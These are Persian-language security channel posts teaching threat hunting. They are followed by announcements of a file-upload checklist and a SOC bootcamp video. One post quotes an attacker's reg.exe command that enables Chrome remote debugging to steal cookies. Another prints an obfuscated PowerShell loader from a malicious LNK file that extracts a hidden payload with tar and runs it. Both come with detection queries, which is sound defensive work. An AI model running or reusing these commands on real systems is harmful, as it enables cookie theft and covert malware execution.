🔥 باگ بانتی Mobile Hacking : چک‌ لیست عملی
@TryHackBox
#چک_لیست #باگ_بانتی #checklist

مطمئنم که می‌دانید مهاجمان از قابلیت «remote debugging» اکسپلویت می‌ کنند تا کوکی‌ ها را از مرورگرهای وب استخراج کنند. امروز بررسی می‌ کنیم که مهاجمان چگونه با تغییر رجیستری این قابلیت را فعال می‌ کنند.

اگر به این گزارش نگاه کنید.

متوجه می‌شوید که مهاجم از ابزار reg.exe برای تغییر رجیستری و مجاز کردن remote debugging استفاده کرده است:

reg.exe add HKEY_CURRENT_USER\Software\Policies\Google\Chrome /v RemoteDebuggingAllowed /t REG_DWORD /d 1 /f

برای مثال، می‌ توانیم سوءاستفاده از reg.exe را با نشانه‌های زیر جست‌وجو کنیم:

event_type: "processcreatewin"

AND

proc_file_path: "reg.exe"

AND

cmdline: "RemoteDebuggingAllowed"

یا می‌توان تمرکز را روی تغییر رجیستری گذاشت:

event_type: "registryvaluesetwin"

AND

reg_key_path: "RemoteDebuggingAllowed"

به نظر شما بهترین روش تشخیص و مقابله با چنین سوءاستفاده‌ای در محیط‌های سازمانی چیست و چه لاگ‌ها یا کنترل‌های دیگری را می‌توان برای شناسایی زودهنگام آن به کار گرفت؟

➖➖➖➖➖➖➖➖➖➖➖➖➖
🆔 @TryHackBox
🆔 @TryHackBoxOfficial
🆔 @TryHackBoxStory
🆔 @RadioZeroPod

فرآیند نصب بدافزار اغلب شامل باز کردن (استخراج) داده‌های آرشیو شده است.

امروز بررسی می‌کنیم که مهاجمان چگونه از ابزار tar اکسپلویت می‌کنند و چگونه می‌توان از این موضوع برای شکار پیش‌ دستانه (Proactive Hunting) استفاده کرد.

بیایید به UNC6384 نگاه کنیم.

مهاجم از یک فایل LNK مخرب استفاده کرده که شامل دستور زیر بوده است:

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -c " ;; ;$uojsbmkvp = (get-childitem -Pa $Env:USERPROFILE -Re -Inc *'Agenda_Meeting 26 Sep Brussels'.zip).fullname; ;;$ophcrygyu=[System.IO.File]::ReadAllBytes($uojsbmkvp);$xkasluyk=721; ;$lrbnaoxkomoi=[char]87+'r'+[char]105+'te'+[char]65+'l'+[char]108+'b'+[char]121+'tes'; ;echo $xkasluyk; ; ;echo $xkasluyk;;[System.IO.File]::$lrbnaoxkomoi($Env:temp+'\\rjnlzlkfe.ta', $ophcrygyu[$xkasluyk..($xkasluyk+1204224-1)]); ;;;echo $xkasluyk;;;;echo $xkasluyk;; TaR -xvf $Env:TEMP\rjnlzlkfe.ta -C $Env:Temp; Start-Process $Env:temp\cnmpaui.exe;"

این اسکریپت کارهای زیر را انجام می‌دهد:

به‌دنبال یک فایل ZIP با نام Agenda_Meeting 26 Sep Brussels.zip می‌گردد

محتوای آن را می‌خواند

یک بخش پنهان از داده‌ها که داخل این ZIP جاسازی شده را استخراج می‌کند (از بایت 721 به بعد)

این بخش پنهان را در یک فایل موقت ذخیره می‌کند (rjnlzlkfe.ta)

آن را با استفاده از tar استخراج می‌کند

یک فایل اجرایی را اجرا می‌کند

cnmpaui.exe :
— یک فایل قانونی که برای side-loading استفاده می‌شود


حالا روی tar تمرکز کنیم:

tar.exe -xvf C:\Users\<USER>\AppData\Local\Temp\rjnlzlkfe.ta -C C:\Users\<USER>\AppData\Local\Temp

برای مثال، می‌توان موارد اجرای tar از طریق PowerShell را جست‌وجو کرد:

event_type: "processcreatewin"

AND

proc_p_file_path: "powershell.exe"

AND

proc_file_path: "tar.exe"

همچنین می‌توان به‌دنبال استفاده از tar برای استخراج آرشیو در پوشه موقت (Temp) بود:

event_type: "processcreatewin"

AND

proc_file_path: "tar.exe"

AND

cmdline: ("xvf" AND "temp")

به نظر شما بهترین راه شناسایی اجرای مشکوک tar در سناریوهای واقعی چیست؟

➖➖➖➖➖➖➖➖➖➖➖➖➖
🆔 @TryHackBox
🆔 @TryHackBoxOfficial
🆔 @TryHackBoxStory
🆔 @RadioZeroPod

🔥 چک لیست آسیب پذیری File Upload

@TryHackBox
#چک_لیست #آسیب_پذیری

🚀 قسمت اول بوتکمپ SOC 0x4131!


🔗 Youtube:
https://youtu.be/-lwI1ifaIXQ

🟠 در این قسمت سرفصل‌های کلیدی زیر رو بررسی کردیم:

- کلمات و اصطلاحات
- چیستی مرکز عملیات امنیت
- کار ها و وظایف در SOC
- مدل های کارکردن و جریان کاری در SOC
- نحوه بالا بردن مهارت در SOC

این مباحث پایه‌ای، شما را برای ورود به دنیای امنیت سایبری آماده می‌کند.


@TryHackBox

#SOC #امنیت_سایبری #بوتکمپ_SOC